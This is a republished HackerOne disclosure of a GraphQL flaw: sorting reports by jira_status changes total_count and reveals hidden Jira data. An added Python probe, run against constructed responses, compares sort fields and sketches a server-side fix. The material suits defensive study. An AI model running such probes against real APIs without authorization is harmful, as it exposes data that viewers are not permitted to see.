HackerOne: GraphQL: Sorting the reports by the jira_status field resulted in a different value
News category: Security vulnerabilities
Source: vulners.com
Summary: Sorting the reports by jira_status yields a different result, which reveals that the team uses Jira even though the user has no access to that information.

Description: A user with no access to the Jira information of any report can still reach the Jira field by using order_by with jira_status. Using the two GraphQL queries below, the discrepancy in total_count can be seen for the following test teams:

Test teams:
1. █████████: order_by field: id = total_count: 10; order_by field: jira_status = total_count: 11
2. ██████████: order_by field: id = total_count: 458; order_by field: jira_status = total_count: 466
3. ████: order_by field: id = total_count: 299; order_by field: jira_status = total_count: 309
4. ███: order_by field: id = total_count: 109; order_by field: jira_status = total_count: 110

GraphQL query: using the field id as the order_by criterion yields the same result; only the jira_status field differs.

{
  reports(where: {team: {handle: {_eq: "██████"}}}, order_by: {direction: ASC, field: id}) {
    total_count
    nodes {
      substate
      jira_escalation_state
      jira_escalation_last_state_change_at
      created_at
      disclosed_at
      extracted_report_data {
        hosts
      }
      title
      url
      team {
        handle
      }
      reporter {
        username
      }
    }
  }
}

Change the field in order_by to jira_status to get a different result. Below is part of the response using jira_status as the field; notice that jira_escalation_state and...
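The check the reporter did by hand, as an added example that is not part of the original report or HackerOne's code: request the same reports connection once ordered by id and once by each candidate sort field, and flag any field whose sort path changes total_count or the set of returned nodes. The transport is abstracted behind a fetch callable, the responses are constructed to mirror the first test team (10 vs 11), the id field added to the selection set and the authorize_order_by guard are assumptions about how such a finding would be probed and closed, not HackerOne's implementation.

```python
"""Probe a GraphQL connection for sort-key authorization leaks.

Added example, not HackerOne's code.  Responses are constructed."""
from typing import Callable, Dict, List

# Selection set follows the query in the report; `id` is added as a stable key.
QUERY_TEMPLATE = """{
  reports(where: {team: {handle: {_eq: "%s"}}},
          order_by: {direction: ASC, field: %s}) {
    total_count
    nodes { id substate jira_escalation_state title url }
  }
}"""


def build_reports_query(handle: str, order_field: str) -> str:
    """GraphQL document ordering a team's reports by `order_field`."""
    return QUERY_TEMPLATE % (handle, order_field)


def diff_results(base: Dict, probe: Dict) -> Dict:
    """Compare two parsed responses for the same `where` clause.

    A sort key must never change which rows a viewer can see; a non-zero
    delta means the order_by code path applies different visibility
    rules than the default path."""
    b = base["data"]["reports"]
    p = probe["data"]["reports"]
    base_ids = {n["id"] for n in b["nodes"]}
    probe_ids = {n["id"] for n in p["nodes"]}
    return {
        "count_delta": p["total_count"] - b["total_count"],
        "only_in_probe": sorted(probe_ids - base_ids),
        "only_in_base": sorted(base_ids - probe_ids),
    }


def probe_order_fields(fetch: Callable[[str], Dict], handle: str,
                       candidate_fields: List[str],
                       baseline_field: str = "id") -> Dict[str, Dict]:
    """Run the baseline query plus one query per candidate sort field and
    return only the fields whose result set differs from the baseline."""
    base = fetch(build_reports_query(handle, baseline_field))
    findings = {}
    for field in candidate_fields:
        diff = diff_results(base, fetch(build_reports_query(handle, field)))
        if diff["count_delta"] or diff["only_in_probe"] or diff["only_in_base"]:
            findings[field] = diff
    return findings


def authorize_order_by(order_field: str, viewer_readable_fields: set) -> None:
    """Server-side guard (assumed fix design, not HackerOne's): a viewer may
    only sort or filter on fields they are allowed to read, so that sort
    order and row counts cannot act as an oracle for hidden data."""
    if order_field not in viewer_readable_fields:
        raise PermissionError(
            f"order_by on {order_field!r} is not permitted for this viewer")


# --- constructed responses standing in for the live API -------------------
def _node(i: int, jira_state=None) -> Dict:
    return {"id": i, "substate": "new", "jira_escalation_state": jira_state,
            "title": f"report {i}", "url": f"https://hackerone.com/reports/{i}"}


def fake_fetch(query: str) -> Dict:
    """Constructed transport: 10 visible reports on the default path, 11 when
    sorted by jira_status, mirroring the first test team in the report."""
    nodes = [_node(i) for i in range(1, 11)]
    if "field: jira_status" in query:
        nodes.append(_node(11, jira_state="escalated"))
    return {"data": {"reports": {"total_count": len(nodes), "nodes": nodes}}}


if __name__ == "__main__":
    found = probe_order_fields(fake_fetch, "example-team",
                               ["created_at", "jira_status"])
    for field, diff in found.items():
        print(f"{field}: total_count delta {diff['count_delta']:+d}, "
              f"extra nodes {diff['only_in_probe']}")
    try:
        authorize_order_by("jira_status", {"id", "created_at", "title"})
    except PermissionError as exc:
        print("hardened server would reject:", exc)
```

To run it against a real endpoint, replace fake_fetch with a function that POSTs the query with the low-privilege user's session and returns the parsed JSON; the comparison logic is unchanged. The guard illustrates the general rule: filtering and sorting are reads, so they need the same field-level authorization as the field itself.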